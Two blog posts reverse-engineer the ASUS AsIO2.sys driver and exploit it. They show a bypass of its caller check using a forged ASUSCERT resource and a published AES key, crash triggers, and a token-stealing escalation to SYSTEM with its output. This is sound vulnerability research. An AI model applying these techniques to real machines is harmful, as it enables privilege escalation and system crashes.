Bof.

No theme, no regular posting.

© 2014-2024. Raphaël Rigo CC-BY-SA 4.0

ASUS ASIO2.sys exploitation

This post is a follow-up to the vulnerability research on the ASUS AsIO2 driver, which gives Everyone, among other things, the following primitives:

  • arbitrary MSR read and write
  • R/W access to arbitrary physical memory
  • a stack based buffer overflow

My initial tests on physical memory seemed to indicate it was read-only, but that was the result of me swapping the results of AllocatePhysMemory.

However, it’s interesting to see how one can check the mappings between virtual and physical.

The following code allocates physical memory using AsIO2, maps it into a new user-accessible page and dumps its content (AllocatePhysMemory is broken in x64, as we’ll see):

uint32_t phys_addr;
uint32_t virt_addr;
uint64_t value;  // user-mode address returned by ASIO_MapMem

phys_addr = AllocatePhysMemory(0x1000, &virt_addr);
printf("AllocatePhysMemory: (virtual: %08x / physical: %08x)\n", virt_addr, phys_addr);

// Map the newly allocated physical mem
value = ASIO_MapMem(phys_addr, 0x1000);
unsigned char *ptr = (unsigned char*)value;
printf("Ptr: %p\n", ptr);
memcpy(ptr, "etst", 4);
hexdump("new mem", (void *)value, 0x10);
getchar();  // Used to flush the display and wait to trigger the breakpoint
DebugBreak();

Let’s put a breakpoint right after the call to MmAllocateContiguousMemory and run the code:

0: kd> bp AsIO2+0x1a80 "r rax; g"
0: kd> g
...
rax=ffffbb80e416c000
Break instruction exception - code 80000003 (first chance)
KERNELBASE!wil::details::DebugBreak+0x2:
0033:00007ffe`90f40bb2 cc              int     3

Now we can check which physical page is mapped to 0xffffbb80e416c000:

0: kd> !pte ffffbb80e416c000
                                           VA ffffbb80e416c000
PXE at FFFFF77BBDDEEBB8    PPE at FFFFF77BBDD77018    PDE at FFFFF77BAEE03900    PTE at FFFFF75DC0720B60
contains 0A00000003C30863  contains 0A00000003C31863  contains 0A000000502AD863  contains 0A000000BF348863
pfn 3c30      ---DA--KWEV  pfn 3c31      ---DA--KWEV  pfn 502ad     ---DA--KWEV  pfn bf348     ---DA--KWEV

As the PTE is 0x0A000000BF348863, we know the physical address is 0xBF348000 (PFN 0xbf348 shifted left by 12 bits).

The shell displays:

AllocatePhysMemory: (virtual: e416c000 / physical: bf348000)
Ptr: 0000000000188000
new mem
  0000  10 59 de 73 dc ee ff ff 50 4c e6 73 dc ee ff ff  .Y.s....PL.s....

Note that the virtual address returned is:

  • a kernel one, unusable for userland
  • truncated as the driver only returns 32 bits.

So let’s check 0x188000 is mapped to the same physical address:

0: kd> !pte 188000
                                           VA 0000000000188000
PXE at FFFFF77BBDDEE000    PPE at FFFFF77BBDC00000    PDE at FFFFF77B80000000    PTE at FFFFF70000000C40
contains 8A00000057BBC867  contains 0A00000057BBD867  contains 0A000000447C2867  contains 8A000000BF348867
pfn 57bbc     ---DA--UW-V  pfn 57bbd     ---DA--UWEV  pfn 447c2     ---DA--UWEV  pfn bf348     ---DA--UW-V

As you can see, the PTE contains the same physical address. However, the letter U instead of K shows that the virtual address is accessible from userland, and the W that it is writable. Neat!
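To make the flag letters less magical, here is a minimal Python sketch that decodes the two PTE values shown above. It assumes the standard x86-64 4 KiB page layout (physical frame in bits 12 to 51, V/W/U/A/D in the low bits, NX in bit 63); the function and field names are mine, not WinDbg's.

```python
# Decode an x86-64 page table entry mapping a 4 KiB page.
PHYS_MASK = 0x000FFFFFFFFFF000  # bits 12..51 hold the physical frame address


def decode_pte(pte):
    """Return the physical address and the main flag bits of a PTE."""
    return {
        "phys": pte & PHYS_MASK,
        "valid": bool(pte & (1 << 0)),       # V
        "writable": bool(pte & (1 << 1)),    # W
        "user": bool(pte & (1 << 2)),        # U if set, K otherwise
        "accessed": bool(pte & (1 << 5)),    # A
        "dirty": bool(pte & (1 << 6)),       # D
        "no_execute": bool(pte & (1 << 63)),  # E is displayed when this is clear
    }


kernel_pte = decode_pte(0x0A000000BF348863)  # PTE for ffffbb80e416c000
user_pte = decode_pte(0x8A000000BF348867)    # PTE for 0000000000188000

print(hex(kernel_pte["phys"]), "user" if kernel_pte["user"] else "kernel")
print(hex(user_pte["phys"]), "user" if user_pte["user"] else "kernel")
```

Both entries decode to the same physical address, and only the second one has the user bit set (it also has NX set, hence the missing E in the !pte output).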

Exploit goals and strategy

So my goal here is to get our userland process to have SYSTEM privileges. As we have access to physical memory, we could also leak sensitive data, for example by targeting lsass to recover credentials.

While researching various exploit strategies, I found that many drivers exhibit such vulnerabilities and that research is rather abundant. The following works were very useful:

Only having access to physical memory makes exploitation a bit more interesting:

  • we don’t have access to MmGetPhysicalAddress to do VA to PA translation
  • so we have no direct way to find interesting structures or secrets

Exploit: token stealing

Token stealing is a well known technique used for LPE, where one rewrites the token pointer in the attacker’s process to point to a privileged process’ token.

Morten Schenk has a good blog post explaining the technique.

Here, however, we have the following constraints:

  • we are in userland, so we do not know where our EPROCESS structure is in memory
  • we don’t know where our cr3 points, either
  • thanks to KASLR, there are no interesting structures at fixed physical addresses (at least that’s what I believe, with my limited knowledge of Windows internals)

I initially thought that I could use volatility’s techniques to find the interesting structures. But when I found ReWolf’s exploit I realized that it was just perfect: one just needs to implement a new class which will provide the exploit access to the target’s physical memory, which is trivial in our case.

Adding AsIO2 support to ReWolf’s exploit

Adding the provider

The WinIO provider in ReWolf’s exploit is basically identical to ours, except for the DeviceIoControl code. So no need to detail it, I just added a log to tell the user if opening the device failed (in case the ASUSCERT resource is invalid for example).

Compiling under MinGW

Of course I was not going to use Visual Studio to compile the exploit, but as it’s written in (over-engineered, in ReWolf’s own words) C++, I feared compilation would be complex.

Well, not really. I just had to patch a few things:

  • fix includes broken by filename case
  • add an explicit extern for GetPhysicallyInstalledSystemMemory
  • replace bstr_t with SysAllocString (Update: actually, I just needed to include comutil.h)
  • detect the Windows 10 version to handle the new offset for Token in version 1909

Update: A friend pointed me to NtDiff, which is very useful to spot offset changes.

And of course I had to add the ASUSCERT resource entry, as described in the first post.

After doing this, running the exploit is trivial:

C:\Users\toto\Desktop>exploit asio
Win10 1909+ detected, using 0x360 for Token offset
Whoami: desktop-fa65285\toto
Found wininit.exe PID: 00000210
Looking for wininit.exe EPROCESS...
[+] Asusgio2 device opened
EPROCESS: wininit.exe, token: ffff9686b43270a8, PID: 0000000000000210
Stealing token...
Stolen token: ffff9686b43270a8
Looking for exploit.exe EPROCESS...
EPROCESS: exploit.exe, token: ffff9686b91df069, PID: 00000000000011d0
Reusing token...
Write at : 00000000001663e0
Whoami: nt authority\system
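To picture what the last steps of that log do, here is a toy Python model. It is only a sketch: "physical memory" is a bytearray, the two EPROCESS locations are made-up addresses, and the helper names are mine. Only the 0x360 Token offset and the two token values come from the output above.

```python
import struct

TOKEN_OFFSET = 0x360  # Token offset printed by the exploit for Win10 1909+


def read_qword(mem, addr):
    """Read a little-endian 64-bit value from the fake physical memory."""
    return struct.unpack_from("<Q", mem, addr)[0]


def write_qword(mem, addr, value):
    """Write a little-endian 64-bit value to the fake physical memory."""
    struct.pack_into("<Q", mem, addr, value)


# Toy memory holding two fake EPROCESS structures (hypothetical addresses).
mem = bytearray(0x2000)
WININIT_EPROCESS = 0x0000
EXPLOIT_EPROCESS = 0x1000
write_qword(mem, WININIT_EPROCESS + TOKEN_OFFSET, 0xFFFF9686B43270A8)
write_qword(mem, EXPLOIT_EPROCESS + TOKEN_OFFSET, 0xFFFF9686B91DF069)

# "Stealing token..." then "Reusing token...": copy the 8-byte Token field.
stolen = read_qword(mem, WININIT_EPROCESS + TOKEN_OFFSET)
write_qword(mem, EXPLOIT_EPROCESS + TOKEN_OFFSET, stolen)

print(hex(read_qword(mem, EXPLOIT_EPROCESS + TOKEN_OFFSET)))
```

The real exploit does the same copy, except that the reads and writes go through the driver's physical memory mapping and the EPROCESS structures first have to be found by scanning.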

Exploit code

Grab it on GitHub.

Going further

If you want more shitty driver exploits, check hfiref0x’s gist and add support for them in the tool ;)

ASUS ASIO2.sys driver fun

So a friend built a new PC, and he installed some fans on his GPU, connected to headers on the GPU board. Unfortunately, setting the fan speed does not seem to work easily on Linux: they don’t spin. Update: He did finally get everything working. Here is the writeup.

On Windows, ASUS GPU Tweak II works. So the idea was to reverse it to understand how it works.

Having had a look at the various files and drivers, he thought AsIO2.sys was a good candidate, so I offered to reverse it quickly to check whether it was interesting.

So for reference, that’s the version bundled with GPU Tweak version 2.1.7.1:

5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a AsIO2_64.sys

First look: IDA

Note: I tried to see if Ghidra was any good, but as it does not include the WDK types (yet), I was too lazy and used Hex-Rays.

The main is very simple:

__int64 __fastcall main(PDRIVER_OBJECT DriverObject)
{
  NTSTATUS v2; // ebx
  struct _UNICODE_STRING DestinationString; // [rsp+40h] [rbp-28h]
  struct _UNICODE_STRING SymbolicLinkName; // [rsp+50h] [rbp-18h]
  PDEVICE_OBJECT DeviceObject; // [rsp+70h] [rbp+8h]

  DriverObject->MajorFunction[IRP_MJ_CREATE] = dispatch;
  DriverObject->MajorFunction[IRP_MJ_CLOSE] = dispatch;
  DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = dispatch;
  DriverObject->DriverUnload = unload;
  RtlInitUnicodeString(&DestinationString, L"\\Device\\Asusgio2");
  v2 = IoCreateDevice(DriverObject, 0, &DestinationString, 0xA040u, 0, 0, &DeviceObject);
  if ( v2 < 0 )
    return (unsigned int)v2;
  RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\Asusgio2");
  v2 = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
  if ( v2 < 0 )
    IoDeleteDevice(DeviceObject);
  return (unsigned int)v2;
}

As you can see, the driver registers a single function, which I called dispatch, for the main events. Of course, the device path is important too: \\Device\\Asusgio2.

Functionalities: WTF ?

Note that AsIO2.sys comes with a companion DLL which makes it easier for us to call the various functions. Here’s the gory list, what could possibly go wrong ?

ASIO_CheckReboot
ASIO_Close
ASIO_GetCpuID
ASIO_InPortB
ASIO_InPortD
ASIO_MapMem
ASIO_Open
ASIO_OutPortB
ASIO_OutPortD
ASIO_ReadMSR
ASIO_UnmapMem
ASIO_WriteMSR
AllocatePhysMemory
FreePhysMemory
GetPortVal
MapPhysToLin
OC_GetCurrentCpuFrequency
SEG32_CALLBACK
SetPortVal
UnmapPhysicalMemory

Let’s check if everyone can access it.

Device access security

You can note in the device creation code that it is created using IoCreateDevice, and not IoCreateDeviceSecure, which means the security descriptor will be taken from the registry (initially from the .inf file), if it exists.

So here, in theory, we have a device which everyone can access. However, when trying to get the properties in WinObj, we get an “access denied” error, even as admin. After setting up WinDbg, we can check the security descriptor directly to confirm everyone should have access:

0: kd> !devobj \device\asusgio2
Device object (ffff9685541c3d40) is for:
 Asusgio2 \Driver\Asusgio2 DriverObject ffff968551f33d40
Current Irp 00000000 RefCount 1 Type 0000a040 Flags 00000040
SecurityDescriptor ffffdf84fd2b90a0 DevExt 00000000 DevObjExt ffff9685541c3e90 
ExtensionFlags (0x00000800)  DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)  
Device queue is not busy.
0: kd> !sd ffffdf84fd2b90a0 0x1
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x8814
            SE_DACL_PRESENT
            SE_SACL_PRESENT
            SE_SACL_AUTO_INHERITED
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl    : 
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x5c
->Dacl    : ->AceCount   : 0x4
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001201bf
->Dacl    : ->Ace[0]: ->SID: S-1-1-0 (Well Known Group: localhost\Everyone)
[...]

And indeed, Everyone should have RWE access (0x001201bf). But for some reason, WinObj gives an “access denied” error, even when running as admin.
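As a quick sanity check of that mask, here is a small Python snippet that rebuilds it from the standard FILE_GENERIC_* access rights (the constant values are the ones from the Windows SDK headers):

```python
# Standard Windows file access rights (values from winnt.h).
FILE_GENERIC_READ = 0x00120089
FILE_GENERIC_WRITE = 0x00120116
FILE_GENERIC_EXECUTE = 0x001200A0

ace_mask = 0x001201BF  # mask of the Everyone ACE shown by !sd

combined = FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_GENERIC_EXECUTE
print(hex(combined), combined == ace_mask)
```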

Caller Process check

Why does it fail to open the device ? Let’s dig into the dispatch function. At the beginning we can see that sub_140001EA8 is called to determine if the access should fail.

  if ( !info->MajorFunction ) {
    res = !sub_140001EA8() ? STATUS_ACCESS_DENIED : 0;
    goto end;
  }

Inside sub_140001EA8 are several interesting things, including the function sub_1400017B8, which does:

[...]
  v4 = ZwQueryInformationProcess(-1i64, ProcessImageFileName, v3);
      if ( v4 >= 0 )
        RtlCopyUnicodeString(DestinationString, v3);

So it queries the path of the process doing the request, passes it to sub_140002620, which reads it into a newly allocated buffer:

if ( ZwOpenFile(&FileHandle, 0x80100000, &ObjectAttributes, &IoStatusBlock, 1u, 0x20u) >= 0
    && ZwQueryInformationFile(FileHandle, &IoStatusBlock, &FileInformation, 0x18u, FileStandardInformation) >= 0 )
  {
    buffer = ExAllocatePoolWithTag(NonPagedPool, FileInformation.EndOfFile.LowPart, 'pPR');
    res = buffer;
    if ( buffer )
    {
      memset(buffer, 0, FileInformation.EndOfFile.QuadPart);
      if ( ZwReadFile( FileHandle, 0i64, 0i64, 0i64, &IoStatusBlock, res,
             FileInformation.EndOfFile.LowPart, &ByteOffset, 0i64) < 0 )

So let’s rename those functions: we have check_caller, which calls get_process_name, read_file and get_PE_timestamp (which is better viewed in assembly):

.text:140002DA8 get_PE_timestamp proc near              ; CODE XREF: check_caller+B3↑p
.text:140002DA8                 test    rcx, rcx
.text:140002DAB                 jnz     short loc_140002DB3
.text:140002DAD                 mov     eax, STATUS_UNSUCCESSFUL
.text:140002DB2                 retn
.text:140002DB3 ; ---------------------------------------------------------------------------
.text:140002DB3
.text:140002DB3 loc_140002DB3:                          ; CODE XREF: get_PE_timestamp+3↑j
.text:140002DB3                 movsxd  rax, [rcx+IMAGE_DOS_HEADER.e_lfanew]
.text:140002DB7                 mov     ecx, [rax+rcx+IMAGE_NT_HEADERS.FileHeader.TimeDateStamp]
.text:140002DBB                 xor     eax, eax
.text:140002DBD                 mov     [rdx], ecx
.text:140002DBF                 retn
.text:140002DBF get_PE_timestamp endp
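For readers who prefer something higher level than assembly, here is a rough Python equivalent of get_PE_timestamp. It is a sketch under the usual PE layout assumptions: e_lfanew sits at offset 0x3C of the DOS header, and TimeDateStamp is 8 bytes into the NT headers. Like the driver, it does no validation at all. The test image and its timestamp are made up for the example.

```python
import struct

E_LFANEW_OFFSET = 0x3C   # IMAGE_DOS_HEADER.e_lfanew
TIMESTAMP_OFFSET = 0x08  # "PE\0\0" (4) + Machine (2) + NumberOfSections (2)


def get_pe_timestamp(data):
    """Return FileHeader.TimeDateStamp, following e_lfanew like the driver."""
    # movsxd in the driver: e_lfanew is read as a signed 32-bit value
    e_lfanew = struct.unpack_from("<i", data, E_LFANEW_OFFSET)[0]
    return struct.unpack_from("<I", data, e_lfanew + TIMESTAMP_OFFSET)[0]


# Minimal fake image: just enough bytes for the two fields we read.
image = bytearray(0x100)
image[0:2] = b"MZ"
struct.pack_into("<i", image, E_LFANEW_OFFSET, 0x80)
image[0x80:0x84] = b"PE\x00\x00"
struct.pack_into("<I", image, 0x80 + TIMESTAMP_OFFSET, 0x5D6DDF4D)  # made-up value

print(hex(get_pe_timestamp(image)))
```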

If we look at the high-level logic of check_caller, we have (aes_decrypt is easy to identify thanks to constants):

res = get_PE_timestamp(file_ptr, &pe_timestamp);
if ( res >= 0 ) {
  res = sub_1400028D0(file_ptr, &pos, &MaxCount);
  if ( res >= 0 ) {
    if ( MaxCount > 0x10 )
      res = STATUS_ACCESS_DENIED;
    else {
      some_data = 0i64;
      memmove(&some_data, (char *)file_ptr + pos, MaxCount);
      aes_decrypt(&some_data);
      diff = pe_timestamp - some_data;
      diff2 = pe_timestamp - some_data;
      if ( diff2 < 0 )
      {
        diff = some_data - pe_timestamp;
        diff2 = some_data - pe_timestamp;
      }
      res = STATUS_ACCESS_DENIED;
      if ( diff < 7200 )
        res = 0;
    }
  }
}

So sub_1400028D0 reads some information from the calling process’s binary, decrypts it using AES and checks it is within 2 hours of the PE timestamp…

Bypassing the check

So, I won’t get into the details, as it’s not very interesting (it’s just PE structures parsing, which looks ugly), but one of the sub functions gives us a big hint:

bool __fastcall compare_string_to_ASUSCERT(PCUNICODE_STRING String1)
{
  _UNICODE_STRING DestinationString; // [rsp+20h] [rbp-18h]

  RtlInitUnicodeString(&DestinationString, L"ASUSCERT");
  return RtlCompareUnicodeString(String1, &DestinationString, 0) == 0;
}

The code parses the calling PE to look for a resource named ASUSCERT, which we can verify in atkexComSvc.exe, the service which uses the driver:

ASUSCERT resource

and we can use openssl to check that the decrypted value corresponds to the PE timestamp:

$ openssl aes-128-ecb -nopad -nosalt -d -K AA7E151628AED2A6ABF7158809CF4F3C -in ASUSCERT.dat  |hd
00000000  38 df 6d 5d 00 00 00 00  00 00 00 00 00 00 00 00  |8.m]............|
$ date --date="@$((0x5d6ddf38))"
Tue Sep  3 05:34:16 CEST 2019
$ x86_64-w64-mingw32-objdump -x atkexComSvc.exe|grep -i time/date
Time/Date		Tue Sep  3 05:34:37 2019
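The comparison done by check_caller on these values can be sketched in a few lines of Python. I am assuming here that the decrypted block holds a 32-bit little-endian timestamp followed by zeros, which is what the hexdump above suggests. The PE timestamp used below is an illustrative value (decrypted value plus 21 seconds, the gap between the two dates displayed), not one read from the binary.

```python
import struct

MAX_SKEW = 7200  # seconds: the "diff < 7200" test in check_caller


def caller_allowed(pe_timestamp, decrypted_block):
    """Return True when the decrypted ASUSCERT time is close to the PE timestamp."""
    cert_time = struct.unpack_from("<I", decrypted_block, 0)[0]
    return abs(pe_timestamp - cert_time) < MAX_SKEW


# Decrypted ASUSCERT block, as shown by the openssl command above.
block = bytes.fromhex("38df6d5d" + "00" * 12)
cert_time = struct.unpack_from("<I", block, 0)[0]

pe_timestamp = cert_time + 21  # illustrative PE timestamp (assumption)

print(hex(cert_time), caller_allowed(pe_timestamp, block))
print(caller_allowed(cert_time + MAX_SKEW, block))
```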

Once we know this, we just need to generate a PE with the right ASUSCERT resource and which uses the driver.

Compiling for Windows on Linux

As I hate modern Visual Studio versions (huge, mandatory registration, etc.) and am more comfortable under Linux, I set out to compile everything on my Debian.

In fact, nowadays it’s easy, just install the necessary tools with apt install mingw-w64.

This Makefile has everything, including using windres to compile the resource file, which is directly linked by gcc!

CC=x86_64-w64-mingw32-gcc
COPTS=-std=gnu99

asio2: asio2.c libAsIO2_64.a ASUSCERT.o
	$(CC) $(COPTS) -o asio2 -W -Wall asio2.c  libAsIO2_64.a ASUSCERT.o

libAsIO2_64.a: AsIO2_64.def
	x86_64-w64-mingw32-dlltool -d AsIO2_64.def -l libAsIO2_64.a

ASUSCERT.o:
	./make_ASUSCERT.py
	x86_64-w64-mingw32-windres ASUSCERT.rc ASUSCERT.o

Notes:

  • I created the .def using Dll2Def
  • make_ASUSCERT.py just gets the current time and encrypts it to generate ASUSCERT_now.dat
  • ASUSCERT.rc is one line: ASUSCERT RCDATA ASUSCERT_now.dat
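For reference, here is a minimal sketch of what a script like make_ASUSCERT.py can look like. It is not the actual script: the function names are mine, the plaintext layout (32-bit little-endian timestamp padded with zeros to 16 bytes) is inferred from the decrypted block shown earlier, and the encryption simply shells out to the openssl CLI, which is assumed to be installed.

```python
import struct
import subprocess
import time

# AES-128 key, taken from the openssl command used earlier to decrypt ASUSCERT.dat
AES_KEY_HEX = "AA7E151628AED2A6ABF7158809CF4F3C"


def build_plaintext(timestamp):
    """32-bit little-endian timestamp, zero-padded to one 16-byte AES block."""
    return struct.pack("<I", timestamp & 0xFFFFFFFF).ljust(16, b"\x00")


def encrypt_block(plaintext):
    """Encrypt one block with AES-128-ECB using the openssl command line tool."""
    result = subprocess.run(
        ["openssl", "aes-128-ecb", "-e", "-nopad", "-nosalt", "-K", AES_KEY_HEX],
        input=plaintext,
        stdout=subprocess.PIPE,
        check=True,
    )
    return result.stdout


def write_cert(path="ASUSCERT_now.dat"):
    """Write an ASUSCERT blob containing the current time."""
    with open(path, "wb") as f:
        f.write(encrypt_block(build_plaintext(int(time.time()))))
```

Calling write_cert() right before the windres step produces the file referenced by ASUSCERT.rc. Since the PE timestamp is set when linking, both values end up well within the 2 hour window.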

Update: Dll2Def is useless, the dll can be directly specified to gcc:

$(CC) $(COPTS) -o asio2 -W -Wall asio2.c  AsIO2_64.dll ASUSCERT.o

Using AsIO2.sys

As a normal user, we can now use all the functions the driver provides. For example: BSOD by overwriting the IA32_LSTAR MSR:

extern int ASIO_WriteMSR(unsigned int msr_num, uint64_t *val);

ASIO_WriteMSR(0xC0000082, &value);

Or allocating, and mapping arbitrary physical memory:

value = ASIO_MapMem(0xF000, 0x1000);

printf("MapMem: %016" PRIx64 "\n", value);
hexdump("0xF000", (void *)value, 0x100);

will display:

MapMem: 000000000017f000
0xF000
  0000  00 f0 00 40 ec f7 ff ff 00 40 00 40 ec f7 ff ff  ...@.....@.@....
  0010  cb c8 44 0e 00 00 00 00 46 41 43 50 f4 00 00 00  ..D.....FACP....
  0020  04 40 49 4e 54 45 4c 20 34 34 30 42 58 20 20 20  .@INTEL 440BX
  0030  00 00 04 06 50 54 4c 20 40 42 0f 00 00 30 f7 0f  ....PTL @B...0..
  0040  b0 e1 42 0e 00 00 09 00 b2 00 00 00 00 00 00 00  ..B.............
  0050  40 04 00 00 00 00 00 00 44 04 00 00 00 00 00 00  @.......D.......
  0060  00 00 00 00 48 04 00 00 4c 04 00 00 00 00 00 00  ....H...L.......

Vulnerabilities

BSOD while reading resources

As the broken decompiled code shows, the OffsetToData field of the ASUSCERT resource entry is added to the section’s offset, and will be dereferenced when reading the resource’s value.

if ( compare_string_to_ASUSCERT(&String1) )
{
    ASUSCERT_entry_off = next_dir->entries[j].OffsetToData;
    LODWORD(ASUSCERT_entry_off) = ASUSCERT_entry_off & 0x7FFFFFFF;
    ASUSCERT_entry = (meh *)((char *)rsrc + ASUSCERT_entry_off);
    if ( (ASUSCERT_entry->entries[j].OffsetToData & 0x80000000) == 0 )
    {
        ASUSCERT_off = ASUSCERT_entry->entries[0].OffsetToData;
        *res_size = *(unsigned int *)((char *)&rsrc->Size + ASUSCERT_off);
        if ( *(DWORD *)((char *)&rsrc->OffsetToData + ASUSCERT_off) )
        v25 = *(unsigned int *)((char *)&rsrc->OffsetToData + ASUSCERT_off)
            + sec->PointerToRawData
            - (unsigned __int64)sec->VirtualAddress;
        else
        v25 = 0i64;
        *asus_cert_pos = v25;
        res = 0;
        break;
    }
}

So, setting the OffsetToData to a large value will trigger an out-of-bounds read, and a BSOD:

*** Fatal System Error: 0x00000050
                       (0xFFFF82860550C807,0x0000000000000000,0xFFFFF8037D4F3140,0x0000000000000002)

Driver at fault: 
***     AsIO2.sys - Address FFFFF8037D4F3140 base at FFFFF8037D4F0000, DateStamp 5cac6cf4

0: kd> kv
 #  RetAddr           : Args to Child                        : Call Site
00  fffff803`776a9942 : ffff8286`0550c807 00000000`00000003  : nt!DbgBreakPointWithStatus
[...]
06  fffff803`7d4f3140 : fffff803`7d4f1fb3 00000000`00000000  : nt!KiPageFault+0x360
07  fffff803`7d4f1fb3 : 00000000`00000000 ffff8285`05514000  : AsIO2+0x3140
08  fffff803`7d4f1b96 : 00000000`c0000002 00000000`00000000  : AsIO2+0x1fb3
09  fffff803`7750a939 : fffff803`77aaf125 00000000`00000000  : AsIO2+0x1b96
0a  fffff803`775099f4 : 00000000`00000000 00000000`00000000  : nt!IofCallDriver+0x59
[...]
15  00000000`0040176b : 00007ffe`fa041b1c 00007ffe`ebd2a336  : AsIO2_64!ASIO_Open+0x45
16  00007ffe`fa041b1c : 00007ffe`ebd2a336 00007ffe`ebd2a420  : asio2_rsrc_bsod+0x176b

AsIO2+0x1fb3 is the address right after the memmove:

memmove(&ASUSCERT, (char *)file_ptr + asus_cert_pos, MaxCount);
decrypt(&ASUSCERT);
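The missing validation is easy to picture. Here is a hedged Python sketch of the same RVA to file offset computation as in the decompiled code (OffsetToData + PointerToRawData - VirtualAddress), with the bounds check the driver does not do. The function name, its parameters and the example values are mine.

```python
def resource_file_offset(offset_to_data, pointer_to_raw_data, virtual_address,
                         size, file_size):
    """Convert a resource data RVA to a file offset, rejecting out-of-file ranges."""
    if offset_to_data == 0:
        return 0  # same special case as the driver (v25 = 0)
    pos = offset_to_data + pointer_to_raw_data - virtual_address
    # The driver goes straight to memmove(file_ptr + pos, size) without this check.
    if pos < 0 or size > file_size or pos > file_size - size:
        raise ValueError("resource data lies outside the file")
    return pos


# Made-up section values: .rsrc at RVA 0x3000, stored at file offset 0x1600.
print(hex(resource_file_offset(0x3058, 0x1600, 0x3000, 0x10, 0x2000)))

try:
    resource_file_offset(0x7FFFFFF0, 0x1600, 0x3000, 0x10, 0x2000)
except ValueError as exc:
    print("rejected:", exc)
```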

Trivial stack based buffer overflow

The UnMapMem function is vulnerable to the most basic buffer overflow a driver can have:

  map_mem_req Dst; // [rsp+40h] [rbp-30h]
  [...]
  size = info->Parameters.DeviceIoControl.InputBufferLength;  // user-controlled, never checked
  memmove(&Dst, Irp->AssociatedIrp.SystemBuffer, size);

Which can be triggered with a simple:

#define ASIO_UNMAPMEM 0xA0402450
int8_t buffer[0x48] = {0};
DWORD returned;

DeviceIoControl(driver, ASIO_UNMAPMEM, buffer, sizeof(buffer), 
                                       buffer, sizeof(buffer),
                                       &returned, NULL);

A small buffer will trigger a BugCheck because of the stack cookie validation, and a longer buffer (4096) will just trigger an out of bounds read:

*** Fatal System Error: 0x00000050
                       (0xFFFFD48D003187C0,0x0000000000000002,0xFFFFF806104031D0,0x0000000000000002)

Driver at fault: 
***     AsIO2.sys - Address FFFFF806104031D0 base at FFFFF80610400000, DateStamp 5cac6cf4

0: kd> kv
 #  RetAddr           : Args to Child                       : Call Site
00  fffff806`0c2a9942 : ffffd48d`003187c0 00000000`00000003 : nt!DbgBreakPointWithStatus
[...]
06  fffff806`104031d0 : fffff806`10401a0a ffffc102`cef7a948 : nt!KiPageFault+0x360
07  fffff806`10401a0a : ffffc102`cef7a948 ffffe008`00000000 : AsIO2+0x31d0
08  fffff806`0c10a939 : ffffc102`cc0f9e00 00000000`00000000 : AsIO2+0x1a0a
09  fffff806`0c6b2bd5 : ffffd48d`00317b80 ffffc102`cc0f9e00 : nt!IofCallDriver+0x59
0a  fffff806`0c6b29e0 : 00000000`00000000 ffffd48d`00317b80 : nt!IopSynchronousServiceTail+0x1a5
0b  fffff806`0c6b1db6 : 00007ffb`3634e620 00000000`00000000 : nt!IopXxxControlFile+0xc10
0c  fffff806`0c1d3c15 : 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
0d  00007ffb`37c7c1a4 : 00007ffb`357d57d7 00000000`00000018 : nt!KiSystemServiceCopyEnd+0x25 
0e  00007ffb`357d57d7 : 00000000`00000018 00000000`00000001 : ntdll!NtDeviceIoControlFile+0x14
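As a side note, the ASIO_UNMAPMEM value used above follows the standard Windows CTL_CODE layout (device type, access, function, method). A small Python helper, with names of my choosing, splits it back into its fields:

```python
def decode_ioctl(code):
    """Split a Windows IOCTL code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,      # 0 == FILE_ANY_ACCESS
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,              # 0 == METHOD_BUFFERED
    }


fields = decode_ioctl(0xA0402450)  # ASIO_UNMAPMEM
print({name: hex(value) for name, value in fields.items()})
```

The device type is 0xa040, the same value passed to IoCreateDevice, and the method is METHOD_BUFFERED, which is why the driver reads its input from Irp->AssociatedIrp.SystemBuffer.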

Bug: broken 64-bit code

The AllocatePhysMemory function is broken on 64-bit systems:

      alloc_virt = MmAllocateContiguousMemory(*systembuffer_, (PHYSICAL_ADDRESS)0xFFFFFFFFi64);
      HIDWORD(systembuffer) = (_DWORD)alloc_virt;
      LODWORD(systembuffer) = MmGetPhysicalAddress(alloc_virt).LowPart;
      *(_QWORD *)systembuffer_ = systembuffer;

MmAllocateContiguousMemory returns a 64-bit value, but the code truncates it to 32 bits before returning it to userland, which will probably trigger some BSOD later…
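The truncation is easy to reproduce in Python. This sketch mimics the HIDWORD/LODWORD packing of the decompiled code; the function name is mine, and the two addresses are the ones observed in the exploitation post above.

```python
def pack_alloc_result(alloc_virt, phys_addr):
    """Pack the result like the driver: two 32-bit halves in one 64-bit value."""
    hi = alloc_virt & 0xFFFFFFFF  # HIDWORD = (_DWORD)alloc_virt: upper 32 bits lost
    lo = phys_addr & 0xFFFFFFFF   # LODWORD = MmGetPhysicalAddress(...).LowPart
    return (hi << 32) | lo


packed = pack_alloc_result(0xFFFFBB80E416C000, 0xBF348000)
print(hex(packed))        # value written back to the system buffer
print(hex(packed >> 32))  # "virtual" address as seen from userland
```

The upper half of the kernel pointer (0xffffbb80) is simply gone, so whatever userland passes back later cannot be the address that was actually allocated.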

Going further

Exploitability

Given the extremely powerful primitives we have here, an arbitrary code exec exploit is very likely. I will try to exploit it and, maybe, do a writeup about it.

Disclosure ?

So, after looking at that driver, I thought that it was too obviously vulnerable for me to be the first one to see it. And indeed, several people had looked at it before:

Considering the vulnerability was already public and seeing the pain Secure Auth Labs had to go through, I did not try to coordinate disclosure.

WinDbg: setting up a cross-VM debugging, tips

